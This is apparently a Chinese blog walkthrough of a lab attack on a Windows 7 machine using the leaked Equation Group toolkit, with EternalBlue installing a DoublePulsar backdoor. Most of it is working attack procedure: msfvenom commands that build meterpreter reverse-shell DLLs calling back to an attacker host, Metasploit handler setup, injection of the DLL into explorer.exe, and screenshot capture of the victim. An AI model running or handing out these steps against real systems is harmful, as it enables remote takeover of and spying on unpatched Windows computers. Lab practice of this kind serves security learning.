zoukankan      html  css  js  c++  java
  • 方程式工具渗透实战

    攻击机:

    Kali:192.168.1.103

    Win2K3:192.168.1.109

    靶机:

    Win7(x86):192.168.1.108

    1、win2K3上要先装好Python运行环境:

    安装Python-2.6.6.msipywin32-221.win32-py2.6.exe

    2、现在kali上生成payload模块:

    目标主机x86平台:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=5555 -f dll > x86.dll

    目标主机x64平台:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=5555 -f dll > x64.dll

    然后将payload文件拷贝到win2K3C盘根目录下

    3、打开msf

    msfconsole

    设置exploit模块

    use exploit/multi/handler

    set LHOST 192.168.1.103

    set LPORT 5555

    目标主机x86平台:

    set PAYLOAD windows/meterpreter/reverse_tcp

    目标主机x64平台:

    set PAYLOAD windows/x64/meterpreter/reverse_tcp

    开始监听

    exploit

     

    4、在win2K3,打开方程式工具包,在Windows目录下

     

    新建一个名为listeningposts文件夹

     

    否则程序会运行出错。

    运行fb.py文件(以下是在特殊的地方设置,未做说明的地方回车选择默认设置)

     

    由于win2k3安装在虚拟机,为了节省空间只设了一个C盘,所以日志位置设置在C

     

    新建一个工程,name自定义

     

    先用永恒之蓝在目标主机上安装后门

     

    之后回车,target主机选择win72K8R2

     

    Mode选择FB

     

    之后回车默认选择,然后就在目标主机上安装了后门了

     

    然后用怒怼模块

     

    协议选择SMB

     

    平台选择x86

     

    攻击形式选择rundll

     

    Payload选择刚才生成的x86.dll,填入路径

     

    选择被注入的进程,在实验的时候如果选择默认的进程lsass.exe,在注入过程中会导致靶机重启,所以这里填入explorer.exe

     

    然后回车、回车

    直到注入成功

     

    kali上就可以看到回弹

     

    getuid显示靶机IDtest-PC

     

    screenshot截屏

     

    存储在/root/XxmgVxIn.jpeg,就可以看到靶机的屏幕截图

     

  • 相关阅读:
    java Map集合学习
    java web 中的WEB-INF文件夹
    java web 通过前台输入的数据(name-value)保存到后台 xml文件中
    java web前端调试手段
    java学习之多线程
    java 反射学习
    java web前端easyui(layout+tree+双tabs)布局+树+2个选项卡tabs
    java socket编程(也是学习多线程的例子)详细版----转
    rman
    oracle 分区 查询
  • 原文地址:https://www.cnblogs.com/zylq-blog/p/7050331.html
Copyright © 2011-2022 走看看